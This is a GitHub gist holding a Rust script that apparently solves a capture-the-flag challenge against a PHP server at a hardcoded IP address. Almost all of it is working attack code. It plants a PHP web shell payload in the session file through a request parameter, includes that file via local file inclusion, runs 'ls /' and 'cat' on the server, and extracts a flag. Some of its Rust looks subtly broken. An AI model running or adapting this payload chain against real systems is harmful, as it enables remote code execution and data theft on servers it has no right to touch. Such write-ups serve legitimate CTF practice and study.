Skip to content

Instantly share code, notes, and snippets.

@Aviksaikat
Created December 27, 2022 11:43
Show Gist options
  • Save Aviksaikat/9807f1aec355fe5f6ae5ace5d5eff7ac to your computer and use it in GitHub Desktop.
Save Aviksaikat/9807f1aec355fe5f6ae5ace5d5eff7ac to your computer and use it in GitHub Desktop.
get flag script in rust
extern crate reqwest;
extern crate regex;
use reqwest::Client;
use regex::Regex;
fn send_payload(client: &Client) {
let url = "http://44.200.237.73/";
client.get(format!("{}?karma=<?php system($_GET['jadu']); ?>", url).as_str()).send().unwrap();
}
fn payload(cookie: &str, cmd: Option<&str>) -> String {
if let Some(cmd) = cmd {
format!("?karma=/tmp/sess_{}&jadu={}", cookie, cmd)
} else {
format!("?karma=/tmp/sess_{}", cookie)
}
}
fn main() {
let client = Client::new();
let url = "http://44.200.237.73/";
let response = client.get(url).send().unwrap();
let cookie = response.cookies()["PHPSESSID"].value();
let response = client.get(format!("{}{}", url, payload(&cookie, None)).as_str()).send().unwrap();
send_payload(&client);
let response = client.get(format!("{}{}", url, payload(&cookie, Some("ls /"))).as_str()).send().unwrap();
let file_regex = Regex::new(r"seCretJutsuToKillBorUtoKun.txt").unwrap();
let file = file_regex.find(&response.text().unwrap()).unwrap().as_str();
if file.is_empty() {
println!("Oops something wrong no output found!!");
return;
}
send_payload(&client);
let response = client.get(format!("{}{}", url, payload(&cookie, Some(format!("cat /{}", file)))).as_str()).send().unwrap();
let msg = response.text().unwrap().split(":").last().unwrap();
println!("{}", msg);
let flag_regex = Regex::new(r"FLAG{.*}").unwrap();
let flag = flag_regex.find(&msg).unwrap().as_str();
println!("\nFlag: {}", flag);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment